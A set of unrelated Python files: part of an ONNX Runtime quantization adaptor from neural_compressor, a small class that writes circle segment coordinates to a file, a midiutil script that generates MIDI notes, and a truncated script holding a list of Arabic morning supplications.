else: quantize_params = None self.quantize_params = quantize_params quantizer = ONNXQuantizer(tmp_model.model, quantize_config, backend, self.static, quantize_params, self.quantizable_op_types) quantizer.quantize_model() tmp_model.q_config = self._generate_qconfig(model.model, tune_cfg, quantize_params) tmp_model.model = quantizer.model.model self.quantize_config = quantize_config # update so other methods can know current configs self._dump_model_op_stastics(tmp_model) return tmp_model def _generate_qconfig(self, model, tune_cfg, quantize_params): tune_cfg = copy.deepcopy(tune_cfg) for node in model.graph.node: if (node.name, node.op_type) not in tune_cfg['op']: continue scale_info = {} if quantize_params: for input_name in node.input: if input_name in quantize_params: scale_info[input_name] = quantize_params[input_name] for output_name in node.output: if output_name in quantize_params: scale_info[output_name] = quantize_params[output_name] tune_cfg['op'][(node.name, node.op_type)]['scale_info'] = scale_info fwk_info = {} fwk_info['approach'] = self.static fwk_info['backend'] = self.backend fwk_info['workspace_path'] = self.work_space fwk_info['graph_optimization'] = self.graph_optimization tune_cfg['framework_specific_info'] = fwk_info return tune_cfg @dump_elapsed_time("Pass recover model") def recover(self, model, q_config): """Execute the recover process on the specified model. Args: model (object): model need to do quantization. q_config (dict): recover configuration Returns: (dict): quantized model """ self._pre_optimize(model) model = self.pre_optimized_model ort_version = StrictVersion(ort.__version__) if ort_version < ONNXRT152_VERSION: # pragma: no cover logger.warning("Quantize input needs onnxruntime 1.5.2 or newer.") return model if model.model.opset_import[0].version < 11: # pragma: no cover logger.warning("Quantize input needs model opset 11 or newer.") from neural_compressor.adaptor.ox_utils.onnx_quantizer import ONNXQuantizer from onnxruntime.quantization.quant_utils import QuantizationMode backend = QuantizationMode.QLinearOps if self.backend == \ "qlinearops" else QuantizationMode.IntegerOps self.quantizable_ops = self._query_quantizable_ops(model.model) quantize_params, tune_cfg = self._parse_qconfig(q_config) quantize_config = self._cfg_to_quantize_config(tune_cfg) quantizer = ONNXQuantizer(model.model, quantize_config, backend, self.static, quantize_params, self.quantizable_op_types) quantizer.quantize_model() model.model = quantizer.model.model return model def _parse_qconfig(self, q_config): quantize_params = {} tune_cfg = {} for k, v in q_config.items(): if k == 'op': tune_cfg['op'] = {} for op_name_type, op_info in v.items(): node_dict = {} for info_name, info_content in op_info.items(): if info_name != 'scale_info': node_dict[info_name] = info_content else: for tensor_name, param in info_content.items(): quantize_params[tensor_name] = param tune_cfg['op'][op_name_type] = node_dict else: tune_cfg[k] = v if len(quantize_params) == 0: quantize_params = None return quantize_params, tune_cfg def _dump_model_op_stastics(self, model): fp32_op_list = self.query_handler.get_op_types_by_precision( # pylint: disable=no-member precision='int8') if self.backend == "qlinearops": int8_op_list = ["QLinearConv", "QLinearMatMul", "QAttention", "QLinearMul", "QLinearRelu", "QLinearClip", "QLinearLeakyRelu", "QLinearSigmoid", "MaxPool","Squeeze", "EmbedLayerNormalization", "QLinearGlobalAveragePool", "QLinearAdd", "Pad", "Split", "Gather", "Reshape", "Concat", "QuantizeLinear", "DequantizeLinear", "QLinearAveragePool", "Unsqueeze", "Transpose" ] else: int8_op_list = ["ConvInteger", "MatMulInteger", "QAttention", "DynamicQuantizeLSTM", "Gather", "EmbedLayerNormalization", "DynamicQuantizeLinear" ] res = {} for op_type in fp32_op_list: res[op_type] = {'INT8':0, 'BF16': 0, 'FP32':0} for op_type in ["QuantizeLinear", "DequantizeLinear", "DynamicQuantizeLinear"]: res[op_type] = {'INT8':0, 'BF16': 0, 'FP32':0} for node in model.model.graph.node: possible_int8_res = [name for name in int8_op_list if node.op_type.find(name) != -1] if any(possible_int8_res): if self.backend == "qlinearops": if node.op_type == "QuantizeLinear" or node.op_type == "DequantizeLinear" \ or node.op_type == "DynamicQuantizeLinear": origin_op_type = node.op_type else: origin_op_type = possible_int8_res[0].split('QLinear')[-1] else: origin_op_type = possible_int8_res[0].split('Integer')[0] if node.op_type in ["Pad", "Split", "Gather", "Concat", "Reshape", "Unsqueeze", "Squeeze", "Transpose"]: if any([output.endswith('_quantized') for output in node.output]): origin_op_type = node.op_type else: if node.op_type in res: res[node.op_type]['FP32'] += 1 continue if origin_op_type == "QAttention": origin_op_type = "Attention" res[origin_op_type]['INT8'] += 1 elif node.op_type in fp32_op_list: res[node.op_type]['FP32'] += 1 output_data = [[op_type, sum(res[op_type].values()), res[op_type]['INT8'], res[op_type]['BF16'], res[op_type]['FP32']] for op_type in res.keys()] OpPrecisionStatistics(output_data).print_stat() def _get_quantize_params(self, model, data_loader, quantize_config, iterations): from neural_compressor.adaptor.ox_utils.onnxrt_mid import ONNXRTAugment from neural_compressor.model.onnx_model import ONNXModel if not isinstance(model, ONNXModel): model = ONNXModel(model) black_nodes = [node for node in quantize_config if quantize_config[node]=='fp32'] white_nodes = [node for node in quantize_config if quantize_config[node]!='fp32'] augment = ONNXRTAugment(model, \ data_loader, self.quantizable_op_types, \ os.path.join(self.work_space, 'augmented_model.onnx'), \ black_nodes=black_nodes, white_nodes=white_nodes, \ iterations=list(range(0, quantize_config['calib_iteration']))) quantize_params = augment.dump_calibration() return quantize_params def inspect_tensor(self, model, data_loader, op_list=[], iteration_list=[], inspect_type='activation', save_to_disk=False): '''The function is used by tune strategy class for dumping tensor info. ''' from neural_compressor.adaptor.ox_utils.onnxrt_mid import ONNXRTAugment from neural_compressor.model.onnx_model import ONNXModel if not isinstance(model, ONNXModel): model = ONNXModel(model) if len(op_list) > 0 and isinstance(op_list, KeysView): op_list = [item[0] for item in op_list] augment = ONNXRTAugment(model, data_loader, [], \ os.path.join(self.work_space, 'augment_for_inspect.onnx'), \ iterations=iteration_list, white_nodes=op_list) tensors = augment.dump_tensor(activation=(inspect_type!='weight'), weight=(inspect_type!='activation')) if save_to_disk: np.savez(os.path.join(self.work_space, 'dumped_tensors.npz'), tensors) return tensors def set_tensor(self, model, tensor_dict): from onnx import numpy_helper from neural_compressor.model.onnx_model import ONNXModel from neural_compressor.adaptor.ox_utils.util import quantize_data_with_scale_zero from neural_compressor.adaptor.ox_utils.util import quantize_data_per_channel if not isinstance(model, ONNXModel): model = ONNXModel(model) assert "QuantizeLinear" in [node.op_type for node in model.model.graph.node], \ 'adaptor.set_tensor only accept int8 model' input_name_to_nodes = model.input_name_to_nodes for tensor_name, tensor_value in tensor_dict.items(): if not tensor_name.endswith('_quantized'): tensor_name += '_quantized' not_filter = False scale_tensor, zo_tensor = model.get_scale_zero(tensor_name) if scale_tensor is None or zo_tensor is None: not_filter = True else: scale_value = numpy_helper.to_array(scale_tensor) zo_value = numpy_helper.to_array(zo_tensor) assert len(input_name_to_nodes[tensor_name]) == 1, \ 'quantized filter weight should be input of only one node' node = input_name_to_nodes[tensor_name][0] #TBD only for conv bias node_name = node.name.replace('_quant', '') assert node_name in self.quantize_config q_type = self.quantize_config[node_name]['weight']['dtype'] if not_filter: new_tensor_value = self._requantize_bias(model, tensor_name, tensor_value) elif self.quantize_config[node_name]['weight']['granularity'] == 'per_tensor': new_tensor_value = quantize_data_with_scale_zero( tensor_value, q_type, self.quantize_config[node_name]['weight']['scheme'], scale_value, zo_value) else: new_tensor_value = quantize_data_per_channel( tensor_value, q_type, self.quantize_config[node_name]['weight']['scheme'], scale_value, zo_value) model.set_initializer(tensor_name, new_tensor_value) return model def _requantize_bias(self, model, bias_name, bias_data): ''' helper function to requantize bias, borrowed from onnx_quantizer ''' from onnx import numpy_helper node = model.input_name_to_nodes[bias_name][0] input_scale_name = node.input[1] input_scale = numpy_helper.to_array(model.get_initializer(input_scale_name)) weight_scale_name = node.input[4] weight_scale = numpy_helper.to_array(model.get_initializer(weight_scale_name)) bias_scale = input_scale * weight_scale new_bias_data = (bias_data / bias_scale).round().astype(np.int32) return new_bias_data def _pre_optimize(self, model, level=1): from neural_compressor.adaptor.ox_utils.util import split_shared_input model = split_shared_input(model) sess_options = ort.SessionOptions() level = self.query_handler.get_graph_optimization() # pylint: disable=no-member if self.graph_optimization.level: optimization_levels = { 'DISABLE_ALL': ort.GraphOptimizationLevel.ORT_DISABLE_ALL, 'ENABLE_BASIC': ort.GraphOptimizationLevel.ORT_ENABLE_BASIC, 'ENABLE_EXTENDED': ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED, 'ENABLE_ALL': ort.GraphOptimizationLevel.ORT_ENABLE_ALL} assert self.graph_optimization.level in optimization_levels, "the optimization \ choices are {}".format(optimization_levels.keys()) level = optimization_levels[self.graph_optimization.level] sess_options.graph_optimization_level = level sess_options.optimized_model_filepath = os.path.join(self.work_space, \ "Optimized_model.onnx") _ = ort.InferenceSession(model.model.SerializeToString(), sess_options) tmp_model = onnx.load(sess_options.optimized_model_filepath) model.model = self._replace_gemm_with_matmul(tmp_model).model \ if self.graph_optimization.gemm2matmul else tmp_model model.model = self._rename_node(model.model) self.pre_optimized_model = model def _rename_node(self, model): node_names = [i.name for i in model.graph.node] if len(set(node_names)) < len(node_names): logger.warning("This model has nodes with the same name, please check \ renamed_model.onnx in workspace_path (default is nc_workspace) \ for newly generated node name") for idx, node in enumerate(model.graph.node): if node_names.count(node.name) > 1: node.name = node.op_type + '_nc_rename_' + str(idx) onnx.save(model, os.path.join(self.work_space, "renamed_model.onnx")) return model def _replace_gemm_with_matmul(self, model): new_nodes = [] from onnx import numpy_helper from neural_compressor.model.onnx_model import ONNXModel if not isinstance(model, ONNXModel): model = ONNXModel(model) for node in model.nodes(): if node.op_type == 'Gemm': alpha = 1.0 beta = 1.0 transA = 0 transB = 0 for attr in node.attribute: if attr.name == 'alpha': alpha = onnx.helper.get_attribute_value(attr) elif attr.name == 'beta': beta = onnx.helper.get_attribute_value(attr) elif attr.name == 'transA': transA = onnx.helper.get_attribute_value(attr) elif attr.name == 'transB': transB = onnx.helper.get_attribute_value(attr) if alpha == 1.0 and beta == 1.0 and transA == 0: inputB = node.input[1] if transB == 1: B = model.get_initializer(node.input[1]) if B: # assume B is not used by any other node B_array = numpy_helper.to_array(B) B_trans = numpy_helper.from_array(B_array.T) B_trans.name = B.name model.remove_initializer(B) model.add_initializer(B_trans) #TBD this is for onnx model zoo, which are all in old IR version if model.model.ir_version < 4: for input in model.model.graph.input: if input.name == B_trans.name: for i, dim in enumerate(input.type.tensor_type.shape.dim): dim.dim_value = B_array.T.shape[i] else: inputB += '_Transposed' transpose_node = onnx.helper.make_node('Transpose', inputs=[node.input[1]], outputs=[inputB], name=node.name+'_Transpose') new_nodes.append(transpose_node) matmul_node = onnx.helper.make_node('MatMul', inputs=[node.input[0], inputB], outputs=[node.output[0] + ('_MatMul' if len(node.input)>2 else '')], name=node.name + '_MatMul') new_nodes.append(matmul_node) if len(node.input) > 2: add_node = onnx.helper.make_node('Add', inputs=[node.output[0] + '_MatMul', node.input[2]], outputs=node.output, name=node.name + '_Add') new_nodes.append(add_node) # unsupported else: new_nodes.append(node) # not GEMM else: new_nodes.append(node) model.graph().ClearField('node') model.graph().node.extend(new_nodes) return model def query_fw_capability(self, model): """The function is used to query framework capability. TODO: will be replaced by framework query API Args: model: onnx model Returns: (dict): quantization capability """ # optype_wise and op_wise capability self._pre_optimize(model) quantizable_ops = self._query_quantizable_ops(self.pre_optimized_model.model) optype_wise = OrderedDict() special_config_types = list(self.query_handler.get_quantization_capability()\ ['int8'].keys()) # pylint: disable=no-member default_config = self.query_handler.get_quantization_capability()[\ 'int8']['default'] # pylint: disable=no-member op_wise = OrderedDict() for _, op in enumerate(quantizable_ops): if op.op_type not in special_config_types: op_capability = default_config else: op_capability = \ self.query_handler.get_quantization_capability()[\ 'int8'][op.op_type] # pylint: disable=no-member if op.op_type not in optype_wise.keys(): optype_wise[op.op_type] = copy.deepcopy(op_capability) op_wise.update( {(op.name, op.op_type): copy.deepcopy(op_capability)}) return {'optypewise': optype_wise, 'opwise': op_wise} def _cfg_to_quantize_config(self, tune_cfg): quantize_config = {} quantize_config['calib_iteration'] = tune_cfg['calib_iteration'] granularity = 'per_tensor' algorithm = 'minmax' from onnx import onnx_pb as onnx_proto for _, op in enumerate(self.quantizable_ops): if tune_cfg['op'][(op.name, op.op_type) ]['activation']['dtype'] == 'fp32': quantize_config[op.name] = 'fp32' else: node_config = copy.deepcopy(tune_cfg['op'][(op.name, op.op_type)]) for tensor, config in tune_cfg['op'][(op.name, op.op_type)].items(): if 'granularity' not in config: node_config[tensor]['granularity'] = granularity if 'algorithm' not in config: node_config[tensor]['algorithm'] = algorithm if config['dtype'] == "int8": node_config[tensor]['dtype'] = \ onnx_proto.TensorProto.INT8 # pylint: disable=no-member if 'scheme' not in config: node_config[tensor]['scheme'] = 'sym' else: node_config[tensor]['dtype'] = \ onnx_proto.TensorProto.UINT8 # pylint: disable=no-member if 'scheme' not in config: node_config[tensor]['scheme'] = 'asym' quantize_config[op.name] = node_config return quantize_config def _query_quantizable_ops(self, model): for node in model.graph.node: if node.op_type in self.quantizable_op_types and node not in self.quantizable_ops: self.quantizable_ops.append(node) return self.quantizable_ops def _query_quantizable_op_types(self): quantizable_op_types = self.query_handler.get_op_types_by_precision( \ precision='int8') # pylint: disable=no-member return quantizable_op_types def evaluate(self, input_graph, dataloader, postprocess=None, metric=None, measurer=None, iteration=-1, tensorboard=False, fp32_baseline=False): """The function is for evaluation if no given eval func Args: input_graph : onnx model for evaluation dataloader : dataloader for evaluation. neural_compressor.data.dataloader.ONNXDataLoader postprocess : post-process for evalution. neural_compressor.data.transform.ONNXTransforms metrics: : metrics for evaluation. neural_compressor.metric.ONNXMetrics measurer : neural_compressor.objective.Measurer iteration(int) : max iterations of evaluaton. tensorboard(bool): whether to use tensorboard for visualizaton fp32_baseline (boolen, optional): only for compare_label=False pipeline Returns: (float) evaluation results. acc, f1 e.g. """ sess_options = ort.SessionOptions() if measurer: # https://github.com/microsoft/onnxruntime/issues/7347 cores_per_instance = int(os.environ.get('CORES_PER_INSTANCE')) assert cores_per_instance > 0, "benchmark cores_per_instance should greater than 0" sess_options.intra_op_num_threads = cores_per_instance session = ort.InferenceSession(input_graph.model.SerializeToString(), sess_options) if metric: metric.reset() if hasattr(metric, "compare_label") and not metric.compare_label: self.fp32_preds_as_label = True results = [] ort_inputs = {} len_inputs = len(session.get_inputs()) inputs_names = [session.get_inputs()[i].name for i in range(len_inputs)] def eval_func(dataloader): for idx, (inputs, labels) in enumerate(dataloader): if not isinstance(labels, list): labels = [labels] if len_inputs == 1: ort_inputs.update({inputs_names[0]: inputs}) else: assert len_inputs == len(inputs), \ 'number of input tensors must align with graph inputs' for i in range(len_inputs): # in case dataloader contains non-array input if not isinstance(inputs[i], np.ndarray): ort_inputs.update({inputs_names[i]: np.array(inputs[i])}) else: ort_inputs.update({inputs_names[i]: inputs[i]}) if measurer is not None: measurer.start() predictions = session.run(None, ort_inputs) measurer.end() else: predictions = session.run(None, ort_inputs) if self.fp32_preds_as_label: self.fp32_results.append(predictions) if fp32_baseline else \ results.append(predictions) if postprocess is not None: predictions, labels = postprocess((predictions, labels)) if metric is not None and not self.fp32_preds_as_label: metric.update(predictions, labels) if idx + 1 == iteration: break if isinstance(dataloader, BaseDataLoader) and not self.benchmark: try: eval_func(dataloader) except Exception: # pragma: no cover logger.warning( "Fail to forward with batch size={}, set to {} now.". format(dataloader.batch_size, 1)) dataloader.batch(1) eval_func(dataloader) else: # pragma: no cover eval_func(dataloader) if self.fp32_preds_as_label: from neural_compressor.adaptor.ox_utils.util import collate_preds if fp32_baseline: results = collate_preds(self.fp32_results) metric.update(results, results) else: reference = collate_preds(self.fp32_results) results = collate_preds(results) metric.update(results, reference) acc = metric.result() if metric is not None else 0 return acc def save(self, model, path): """ save model Args: model (ModelProto): model to save path (str): save path """ model.save(os.path.join(path, "best_model.onnx")) @adaptor_registry class ONNXRT_QLinearOpsAdaptor(ONNXRTAdaptor): """The ONNXRT adaptor layer, do onnx-rt quantization, calibration, inspect layer tensors. Args: framework_specific_info (dict): framework specific configuration for quantization. """ def __init__(self, framework_specific_info): self.query_handler = ONNXRTQuery(local_config_file=os.path.join( os.path.dirname(__file__), "onnxrt_qlinear.yaml")) self.backend = "qlinearops" super().__init__(framework_specific_info) @adaptor_registry class ONNXRT_IntegerOpsAdaptor(ONNXRTAdaptor): """The ONNXRT adaptor layer, do onnx-rt quantization, calibration, inspect layer tensors. Args: framework_specific_info (dict): framework specific configuration for quantization. """ def __init__(self, framework_specific_info): self.query_handler = ONNXRTQuery(local_config_file=os.path.join( os.path.dirname(__file__), "onnxrt_integer.yaml")) self.backend = "integerops" super().__init__(framework_specific_info) class ONNXRTQuery(QueryBackendCapability): def __init__(self, local_config_file=None): super().__init__() self.version = ort.__version__ self.cfg = local_config_file self.cur_config = None self._one_shot_query() def _one_shot_query(self): with open(self.cfg) as f: content = yaml.safe_load(f) try: self.cur_config = self._get_specified_version_cfg(content) except Exception as e: # pragma: no cover logger.info("Fail to parse {} due to {}.".format(self.cfg, str(e))) self.cur_config = None raise ValueError("Please check if the format of {} follows Neural Compressor yaml schema.". format(self.cfg)) def _get_specified_version_cfg(self, data): """Get the configuration for the current runtime. If there's no matched configuration in the input yaml, we'll use the `default` field of yaml. Args: data (Yaml content): input yaml file. Returns: [dictionary]: the content for specific version. """ default_config = None for sub_data in data: if sub_data['version']['name'] == self.version: return sub_data if sub_data['version']['name'] == 'default': default_config = sub_data return default_config def get_version(self): # pragma: no cover """Get the current backend version infomation. Returns: [string]: version string. """ return self.cur_config['version']['name'] def get_precisions(self): # pragma: no cover """Get supported precisions for current backend. Returns: [string list]: the precisions' name. """ return self.cur_config['precisions']['names'] def get_op_types(self): # pragma: no cover """Get the supported op types by all precisions. Returns: [dictionary list]: A list composed of dictionary which key is precision and value is the op types. """ return self.cur_config['ops'] def get_quantization_capability(self): """Get the supported op types' quantization capability. Returns: [dictionary list]: A list composed of dictionary which key is precision and value is a dict that describes all op types' quantization capability. """ return self.cur_config['capabilities'] def get_op_types_by_precision(self, precision): """Get op types per precision Args: precision (string): precision name Returns: [string list]: A list composed of op type. """ assert precision in list(self.cur_config['ops'].keys()) return self.cur_config['ops'][precision] def get_graph_optimization(self): """ Get onnxruntime graph optimization level""" optimization_levels = {'DISABLE_ALL': ort.GraphOptimizationLevel.ORT_DISABLE_ALL, 'ENABLE_BASIC': ort.GraphOptimizationLevel.ORT_ENABLE_BASIC, 'ENABLE_EXTENDED': ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED, 'ENABLE_ALL': ort.GraphOptimizationLevel.ORT_ENABLE_ALL} level = self.cur_config['graph_optimization']['level'] assert level in optimization_levels, "the optimization choices \ are {}".format(optimization_levels.keys()) return optimization_levels[level]
nilq/baby-python
python
# 将带分割的圆的坐标信息写入文件 class SegmentInfoWriter(object): def __init__(self, file): self.file=file def setSegmentInfo(self,all_circles, needSegment_idx): self.all_circles = all_circles self.needSegment_idx = needSegment_idx self.__write() def __write(self): num=len(self.needSegment_idx) with open(self.file, 'w') as f: f.write(str(num) + '\n') for idx in self.needSegment_idx: px=int(self.all_circles[idx][0][0]) py=int(self.all_circles[idx][0][1]) pr=int(self.all_circles[idx][1]) line=str(idx)+','+str(px)+','+str(py)+','+str(pr)+'\n' f.write(line)
nilq/baby-python
python
from midiutil import MIDIFile from itertools import repeat import sys bpm = 60 vartrack = 2 toadd = [1,(60,1,2),(62,1,25),(64,1,64),(65,1,53),(67,1,32),(69,1,14),(71,1,87),(72,1,69),2] toadd1= [1,(60,1,5),(62,1,55),(64,1,31),(65,1,45),(67,1,115),(69,1,54),(71,1,87),(72,1,69),2] midi = MIDIFile(vartrack) #it takes the number of tracks as a parameter, I haven't played with it. midi.addTempo(0,0,bpm) time = toadd[0] #if there's initial silence it's the first parameter, for aditional silence please pass the note 0 temp = 1 currtrack = 1 def addnotes(toadd): global temp global time global instrument global currtrack negativeError = ValueError("Start time should be positive") if toadd[0] < 0: raise negativeError if isinstance(toadd[len(toadd)-1], (int)): #if last element is an integer, it's the number of repeats toadd.extend(repeat(toadd,len(toadd)-1)) for i in range(1, len(toadd)-1): try: note = toadd[i][0] #getting the note duration = toadd[i][1] #duration of the note except: pass try: #trying for instrument change instrument = toadd[i][2] #checking for instrument if(instrument != temp): midi.addProgramChange(0, 0, time, instrument) #changing the current instrument temp = instrument print("changed instrument") except: instrument = temp # keep the previous instrument, defaults as Acoustic Grand Piano pass #Continue writting print(note, duration, instrument) midi.addNote(currtrack,0,note,time,duration,100) #Adding the actual note time += duration #incrementing time so that the next note falls where the previous ended print(time) currtrack += 1 #increasing so that the next list is written in another track addnotes(toadd) addnotes(toadd1) with open("test.mid", 'wb') as file: #writting binary file midi.writeFile(file) print("written")
nilq/baby-python
python
import time import datetime import webbrowser import pyperclip import pyautogui AzkharAlsabah = [ "اللَّهُمَّ أنْتَ رَبِّي لا إلَهَ إلَّا أنْتَ، خَلَقْتَنِي وأنا عَبْدُكَ، وأنا علَى عَهْدِكَ ووَعْدِكَ ما اسْتَطَعْتُ، أعُوذُ بكَ مِن شَرِّ ما صَنَعْتُ، أبُوءُ لكَ بنِعْمَتِكَ عَلَيَّ، وأَبُوءُ لكَ بذَنْبِي فاغْفِرْ لِي، فإنَّه لا يَغْفِرُ الذُّنُوبَ إلَّا أنْت", 'أَصبَحْنا على فِطرةِ الإسلامِ، وعلى كَلِمةِ الإخلاصِ، وعلى دِينِ نَبيِّنا محمَّدٍ صلَّى اللهُ عليه وسلَّمَ، وعلى مِلَّةِ أبِينا إبراهيمَ، حَنيفًا مُسلِمًا، وما كان مِنَ المُشرِكينَ', 'سبحانَ اللَّهِ وبحمدِه لا قوَّةَ إلَّا باللَّهِ ما شاءَ اللَّهُ كانَ وما لم يشأ لم يَكن أعلمُ أنَّ اللَّهَ على كلِّ شيءٍ قديرٌ وأنَّ اللَّهَ قد أحاطَ بِكلِّ شيءٍ علمًا', 'قال رسول الله صلى الله عليه وسلم: (مَن قال: بسمِ اللهِ الذي لا يَضرُ مع اسمِه شيءٌ في الأرضِ ولا في السماءِ وهو السميعُ العليمِ، ثلاثُ مراتٍ، لم تصبْه فجأةُ بلاءٍ حتى يُصبحَ)', 'قال رسول الله صلى الله عليه وسلم: (مَن قالَ حينَ يصبحُ وحينَ يُمسي: سبحانَ اللَّهِ وبحمدِهِ مائةَ مرَّةٍ: لم يأتِ أحدٌ يومَ القيامةِ بأفضلَ ممَّا جاءَ بِهِ، إلَّا أحدٌ قالَ مثلَ ما قالَ، أو زادَ علَيهِ)', 'اللهمَّ إني أسألُك العفوَ والعافيةَ، في الدنيا والآخرةِ، اللهمَّ إني أسألُك العفوَ والعافيةَ، في دِيني ودنيايَ وأهلي ومالي، اللهمَّ استُرْ عوراتي، وآمِنْ روعاتي، واحفظني من بين يدي، ومن خلفي، وعن يميني، وعن شمالي، ومن فوقي، وأعوذُ بك أن أُغْتَالَ من تحتي', 'للَّهمَّ بِكَ أصبَحنا، وبِكَ أمسَينا، وبِكَ نحيا وبِكَ نموتُ وإليكَ المصيرُ', 'اللهمَّ إنِّي أعوذُ بك من الهمِّ والحزنِ، والعجزِ والكسلِ، والبُخلِ والجُبنِ، وضَلَعِ الدَّينِ، وغَلَبَةِ الرجالِ', 'اللَّهمَّ إنِّي أسألُكَ خيرَ هذا اليومِ فتحَه، ونصرَه، ونورَه، وبرَكتَه، وَهدايتَهُ، وأعوذُ بِكَ من شرِّ ما فيهِ وشرِّ ما بعدَه', 'اللَّهُمَّ إنِّي أسألُكَ العافيةَ في الدُّنيا والآخِرةِ، اللَّهُمَّ إنِّي أسألُكَ العَفوَ والعافيةَ في دِيني ودُنيايَ، وأهْلي ومالي، اللَّهُمَّ استُرْ عَوْراتي، وآمِنْ رَوْعاتي، اللَّهُمَّ احْفَظْني من بينِ يَدَيَّ، ومن خَلْفي، وعن يَميني، وعن شِمالي، ومن فَوْقي، وأعوذُ بعَظَمتِكَ أنْ أُغْتالَ من تَحْتي', 'اللهم إنا نعوذُ بك من أن نُشرِكَ بك شيئًا نعلَمُه، و نستغفرُك لما لا نعلمُه', 'يا حيُّ يا قيُّومُ، برَحمتِكَ أستَغيثُ، أصلِح لي شأني كُلَّهُ، ولا تَكِلني إلى نَفسي طرفةَ عينٍ', 'اللَّهمَّ ما أصبحَ بي من نعمةٍ أو بأحدٍ من خلقِكَ فمنكَ وحدَكَ لا شريكَ لكَ فلكَ الحمدُ ولكَ الشُّكرُ', 'اللَّهمَّ عالِمَ الغَيبِ والشَّهادةِ، فاطرَ السَّمواتِ والأرضِ، رَبَّ كلِّ شيءٍ ومَليكَهُ، أشهدُ أن لا إلَهَ إلَّا أنتَ، أعوذُ بِكَ مِن شرِّ نفسي وشرِّ الشَّيطانِ وشِركِهِ', '(حَسبيَ اللهُ لا إلهَ إلَّا هو، عليه تَوكَّلْتُ، وهو ربُّ العَرشِ العَظيمِ)، سَبعَ مراتٍ', '(سُبْحَانَ اللهِ وَبِحَمْدِهِ، عَدَدَ خَلْقِهِ وَرِضَا نَفْسِهِ وَزِنَةَ عَرْشِهِ وَمِدَادَ كَلِمَاتِهِ)، وهي تُقال ثلاث مرات', 'سبحانَ اللَّهِ وبحمدِهِ وهي تُقال مئةَ مرَّةٍ', 'اللَّهُمَّ إنِّي أصبَحتُ أُشهِدُك، وأُشهِدُ حَمَلةَ عَرشِكَ، ومَلائِكَتَك، وجميعَ خَلقِكَ: أنَّكَ أنتَ اللهُ لا إلهَ إلَّا أنتَ، وأنَّ مُحمَّدًا عبدُكَ ورسولُكَ', 'رَضيتُ باللَّهِ ربًّا، وبالإسلامِ دينًا، وبِمُحمَّدٍ رسولًا', 'اللَّهمَّ عافِني في بدَني اللَّهمَّ عافِني في سمعي اللَّهمَّ عافِني في بصري لا إلهَ إلَّا أنت. اللَّهمَّ إنِّي أعوذُ بِكَ منَ الكُفْرِ والفقرِ اللَّهمَّ إنِّي أعوذُ بكَ من عذابِ القبرِ لا إلهَ إلَّا أنت تعيدُها ثَلاثَ مرَّاتٍ', 'أَصْبَحْنَا وَأَصْبَحَ المُلْكُ لِلَّهِ وَالْحَمْدُ لِلَّهِ لا إلَهَ إلَّا اللَّهُ، وَحْدَهُ لا شَرِيكَ له . له المُلْكُ وَلَهُ الحَمْدُ وَهو علَى كُلِّ شيءٍ قَدِيرٌ، رَبِّ أَسْأَلُكَ خَيْرَ ما في هذِه اللَّيْلَةِ وَخَيْرَ ما بَعْدَهَا، وَأَعُوذُ بكَ مِن شَرِّ ما في هذِه اللَّيْلَةِ وَشَرِّ ما بَعْدَهَا، رَبِّ أَعُوذُ بكَ مِنَ الكَسَلِ وَسُوءِ الكِبَرِ، رَبِّ أَعُوذُ بكَ مِن عَذَابٍ في النَّارِ وَعَذَابٍ في القَبْرِ', 'اللَّهُمَّ صَلِّ عَلَى مُحَمَّدٍ وَعَلَى آلِ مُحَمَّدٍ، كَمَا صَلَّيْتَ عَلَى إِبْرَاهِيمَ وَعَلَى آلِ إِبْرَاهِيمَ، إِنَّكَ حَمِيدٌ مَجِيدٌ، اللَّهُمَّ بَارِكْ عَلَى مُحَمَّدٍ وَعَلَى آلِ مُحَمَّدٍ، كَمَا بَارَكْتَ عَلَى إِبْرَاهِيمَ وَعَلَى آلِ إِبْرَاهِيمَ، إِنَّكَ حَمِيدٌ مَجِيدٌ (مَن صلى عَلَيَّ حين يُصْبِحُ عَشْرًا ، وحين يُمْسِي عَشْرًا أَدْرَكَتْه شفاعتي يومَ القيامةِ)', 'أستغفرُ اللهَ العظيمَ الذي لا إلهَ إلَّا هو الحيَّ القيومَ وأتوبُ إليه', 'اللَّهمَّ إنِّي أسألُكَ عِلمًا نافعًا ورزقًا طيِّبًا وعملًا متقبَّلًا', 'أعوذُ بكلماتِ اللهِ التَّامَّاتِ مِن شرِّ ما خلَق', 'أعوذُ بكلماتِ اللهِ التَّامَّاتِ مِن شرِّ ما خلَق', 'أعوذُ بكلماتِ اللهِ التَّامَّاتِ مِن شرِّ ما خلَق', 'من قال إذا أصبَح: لا إلهَ إلَّا اللهُ وحدَه لا شريكَ له له الملكُ وله الحمدُ وهو على كلِّ شيءٍ قديرٌ عشْرَ مرَّاتٍ كُتِب له بهنَّ عشْرُ حسناتٍ ومُحي بهنَّ عنه عشْرُ سيِّئاتٍ ورُفِع له بهن عشْرُ درجاتٍ وكُنَّ له عَدْلَ عِتاقةِ أربعِ رقابٍ وكُنَّ له حرَسًا مِن الشَّيطانِ حتَّى يُمسيَ', 'آية الكرسي: (اللَّهُ لَا إِلَٰهَ إِلَّا هُوَ الْحَيُّ الْقَيُّومُ ۚ لَا تَأْخُذُهُ سِنَةٌ وَلَا نَوْمٌ ۚ لَّهُ مَا فِي السَّمَاوَاتِ وَمَا فِي الْأَرْضِ ۗ مَن ذَا الَّذِي يَشْفَعُ عِندَهُ إِلَّا بِإِذْنِهِ ۚ يَعْلَمُ مَا بَيْنَ أَيْدِيهِمْ وَمَا خَلْفَهُمْ ۖ وَلَا يُحِيطُونَ بِشَيْءٍ مِّنْ عِلْمِهِ إِلَّا بِمَا شَاءَ ۚ وَسِعَ كُرْسِيُّهُ السَّمَاوَاتِ وَالْأَرْضَ ۖ وَلَا يَئُودُهُ حِفْظُهُمَا ۚ وَهُوَ الْعَلِيُّ الْعَظِيمُ)', "سورة الإخلاص: (قُلْ هُوَ اللَّهُ أَحَدٌ* اللَّهُ الصَّمَدُ* لَمْ يَلِدْ وَلَمْ يُولَدْ* وَلَمْ يَكُن لَّهُ كُفُوًا أَحَدٌ) ثلاثا", 'سورة الفلق: (قُلْ أَعُوذُ بِرَبِّ الْفَلَقِ* مِن شَرِّ مَا خَلَقَ* وَمِن شَرِّ غَاسِقٍ إِذَا وَقَبَ* وَمِن شَرِّ النَّفَّاثَاتِ فِي الْعُقَدِ* وَمِن شَرِّ حَاسِدٍ إِذَا حَسَدَ) ثلاثا', 'سورة الناس: (قُلْ أَعُوذُ بِرَبِّ النَّاسِ* مَلِكِ النَّاسِ* 